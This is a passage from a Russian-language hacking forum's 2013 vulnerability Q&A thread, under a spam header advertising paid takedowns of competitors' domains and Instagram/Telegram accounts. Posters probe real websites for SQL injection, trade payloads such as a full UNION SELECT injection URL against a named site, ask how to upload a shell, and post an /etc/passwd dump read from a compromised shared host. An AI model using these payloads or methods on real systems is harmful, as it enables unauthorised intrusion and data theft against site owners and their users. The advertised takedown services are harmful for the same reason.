УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 2240 из 2438

2240

Опции темы

Поиск в этой теме

Опции просмотра

#22391

27.04.2013, 01:33

ingoon

Guest

Сообщений: n/a

Провел на форуме:
1469

Репутация: 0

Вопрос по sqli

Всем доброго времени суток. А можно просветить неофита? Скуль однако...

Вбиваем в поисковую форму

1'

Получаем

По вашему запросу 1\' ничего не найдено

Понятно, ' экранируется

Вбиваем

1"

Получаем

По вашему запросу 1\

Ну много чего там найдено, т.е. как то запрос обработан (хз чего там оно искало, 1 ?)

Хорошо,

1"'

По вашему запросу 1\

ничего не найдено

уже не понимаю, экран сработал, но почему разный результат?

Ну и

1'"

А вот тут полный компрес

Ошибка при обращении к БД: 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR `t`.`page`='http://www.bogomerzko.com/search/?query=1'%22' ) AND `t`.`lang`=' at line 1

SELECT `t`.`title`, `t`.`text`, `t`.`keywords`, `t`.`description` FROM `titler` `t` WHERE ( `t`.`page`='/search/?query=1'%22' OR `t`.`page`='http://www.bogomerzko.com/search/?query=1'%22' ) AND `t`.`lang`='1' ORDER BY `t`.`page` DESC LIMIT 1

А как мну дальше? Что обозначает срабатывание на '" ?

#22392

30.04.2013, 23:52

LomasterII

Guest

Сообщений: n/a

Провел на форуме:
5126

Репутация: 5

Цитата:

Сообщение от ingoon

ingoon said:
Всем доброго времени суток. А можно просветить неофита? Скуль однако...
Вбиваем в поисковую форму
1'
Получаем
По вашему запросу 1\' ничего не найдено
Понятно, ' экранируется
Вбиваем
1"
Получаем
По вашему запросу 1\
Ну много чего там найдено, т.е. как то запрос обработан (хз чего там оно искало, 1 ?)
Хорошо,
1"'
По вашему запросу 1\
ничего не найдено
уже не понимаю, экран сработал, но почему разный результат?
Ну и
1'"
А вот тут полный компрес
Ошибка при обращении к БД: 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR `t`.`page`='http://www.bogomerzko.com/search/?query=1'%22' ) AND `t`.`lang`=' at line 1
SELECT `t`.`title`, `t`.`text`, `t`.`keywords`, `t`.`description` FROM `titler` `t` WHERE ( `t`.`page`='/search/?query=1'%22' OR `t`.`page`='http://www.bogomerzko.com/search/?query=1'%22' ) AND `t`.`lang`='1' ORDER BY `t`.`page` DESC LIMIT 1
А как мну дальше? Что обозначает срабатывание на '" ?

пробуй юзать как в последнем варианте:

1'"+union+select+...+--+

ну или для начала проверь

1'"+--+

ошибки не должно быть.

а так больше ничего сказать не могу

#22393

01.05.2013, 16:26

LomasterII

Guest

Сообщений: n/a

Провел на форуме:
5126

Репутация: 5

у меня вопрос

значит есть сайт, на нем есть поиск.

вбиваю в поиск 1, в результатах выводятся все статьи, содержащие цифру 1

вбиваю 35332563567, результат - "ничего не найдено"

вбиваю qwerty, результат " DB query error. Please try later."

а если вбить 'qwerty', то пишет как во втором варианте "ничего не найдено"

пробовал еще 1+--+ или 1#, выводит DB query...

а для 1/* результат как для 1

как мне дальше быть?

если есть кто хорошо понимает, могу в личку сайт скинуть

#22394

01.05.2013, 19:57

winstrool

Познающий

Регистрация: 06.03.2007

Сообщений: 59

Провел на форуме:
371875

Репутация: 137

Цитата:

Сообщение от LomasterII

LomasterII said:
у меня вопрос
значит есть сайт, на нем есть поиск.
вбиваю в поиск 1, в результатах выводятся все статьи, содержащие цифру 1
вбиваю 35332563567, результат - "ничего не найдено"
вбиваю qwerty, результат " DB query error. Please try later."
а если вбить 'qwerty', то пишет как во втором варианте "ничего не найдено"
пробовал еще 1+--+ или 1#, выводит DB query...
а для 1/* результат как для 1
как мне дальше быть?
если есть кто хорошо понимает, могу в личку сайт скинуть

Кидай посмотрю!

#22395

04.05.2013, 09:23

LomasterII

Guest

Сообщений: n/a

Провел на форуме:
5126

Репутация: 5

вот например инъекция

www.bgci.org/garden.php?id=787'+and+1=0+union+select+1,2,3,user (),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38, 39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55 ,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,7 2,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88, 89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,1 04,105,106,107,108,109,110,111,112,113,114,115,116 ,117,118,119,120,121,122,123,124,125,126,127,128,1 29,130,131,132,133,134,135+--+

не другого выхода чтоб вывести информацию? а то 135 полей это слишком

#22396

04.05.2013, 09:42

BigBear

Новичок

Регистрация: 04.12.2008

Сообщений: 11

Провел на форуме:
69033

Репутация: 8

Цитата:

Сообщение от LomasterII

LomasterII said:
вот например инъекция
www.bgci.org/garden.php?id=787'+and+1=0+union+select+1,2,3,user (),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38, 39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55 ,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,7 2,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88, 89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,1 04,105,106,107,108,109,110,111,112,113,114,115,116 ,117,118,119,120,121,122,123,124,125,126,127,128,1 29,130,131,132,133,134,135+--+
не другого выхода чтоб вывести информацию? а то 135 полей это слишком

Либо блайндом, либо error-based. Последний вариант в твоём случае отпадает.

#22397

05.05.2013, 07:35

YCas

Guest

Сообщений: n/a

Провел на форуме:
2896

Репутация: 0

Текущее время: 02:21. Часовой пояс GMT.

Powered by vBulletin® Version 4.2.0

Copyright © 2013 vBulletin Solutions, Inc. All rights reserved.

Перевод: zCarot

кто знает что за нулл?

Как заливать шелл?

Где дырки?

обсуждалось? тогда сорри жду ссылку

#22398

05.05.2013, 16:41

LomasterII

Guest

Сообщений: n/a

Провел на форуме:
5126

Репутация: 5

есть сайт один:

так идет пустая страница

http://site/?pay_system_id=1

а так ошибка

http://site/?pay_system_id=1'

ORA-06502: PL/SQL: numeric or value error: character to number conversion error

это инъекция? никогда не сталкивался с оракл

#22399

05.05.2013, 18:04

Unknown

Guest

Сообщений: n/a

Провел на форуме:
2965

Репутация: 10

Цитата:

Сообщение от LomasterII

LomasterII said:
есть сайт один:
так идет пустая страница
http://site/?pay_system_id=1
а так ошибка
http://site/?pay_system_id=1'
ORA-06502: PL/SQL: numeric or value error: character to number conversion error
это инъекция? никогда не сталкивался с оракл

Не, это не инъекция. Скорее всего ошибка с типом данных у разработчика.

На возможную инъекцию могут указывать следующие коды ошибок: ORA-00933, ORA-01756, ORA-00923 .

#22400

06.05.2013, 00:22

Ups

Guest

Сообщений: n/a

Провел на форуме:
42754

Репутация: 0

Имею читалку.

Есть ли способы найти пути до сайта?

В /etc/passwd простыня:

Код:

Code:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
........
u1724698:x:505:503::/var/www/u1724698:/bin/false
u1725105:x:508:505::/var/www/u1725105:/bin/false
u1725703:x:514:511::/var/www/u1725703:/bin/bash
u1725757:x:515:512::/var/www/u1725757:/bin/false
u1726055:x:517:514::/var/www/u1726055:/bin/bash
u1726273:x:518:515::/var/www/u1726273:/bin/false
u1726588:x:519:516::/var/www/u1726588:/bin/bash
u1727690:x:525:522::/var/www/u1727690:/bin/false
u1727944:x:526:523::/var/www/u1727944:/bin/bash
u1728689:x:529:526::/var/www/u1728689:/bin/bash
u1730438:x:540:537::/var/www/u1730438:/bin/false
u1730873:x:541:538::/var/www/u1730873:/bin/bash
u1731459:x:542:539::/var/www/u1731459:/bin/false
u1732269:x:545:542::/var/www/u1732269:/bin/bash
u1732843:x:558:555::/var/www/u1732843:/bin/bash
u1736727:x:568:565::/var/www/u1736727:/bin/false
u1733648:x:571:568::/var/www/u1733648:/bin/bash
u1739821:x:580:577::/var/www/u1739821:/bin/bash
u1739860:x:581:578::/var/www/u1739860:/bin/bash
u1740237:x:582:579::/var/www/u1740237:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
u1741842:x:591:588::/var/www/u1741842:/bin/bash
u1742085:x:593:590::/var/www/u1742085:/bin/bash
u1742435:x:594:591::/var/www/u1742435:/bin/bash
u1730937:x:599:596::/var/www/u1730937:/bin/bash
u1743741:x:601:598::/var/www/u1743741:/bin/bash
u1744116:x:603:600::/var/www/u1744116:/bin/bash
u1744426:x:606:603::/var/www/u1744426:/bin/bash
u1744904:x:610:607::/var/www/u1744904:/bin/bash
u1747647:x:620:617::/var/www/u1747647:/bin/bash
u1750941:x:629:626::/var/www/u1750941:/bin/bash
u1753996:x:638:635::/var/www/u1753996:/bin/bash
u1755152:x:643:640::/var/www/u1755152:/bin/bash
и т.д

На сайте стоит SMF 2.0.4. Есть что к нему? Путь нужно только расскрыть. Спасибо.

Страница 2240 из 2438

2240

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход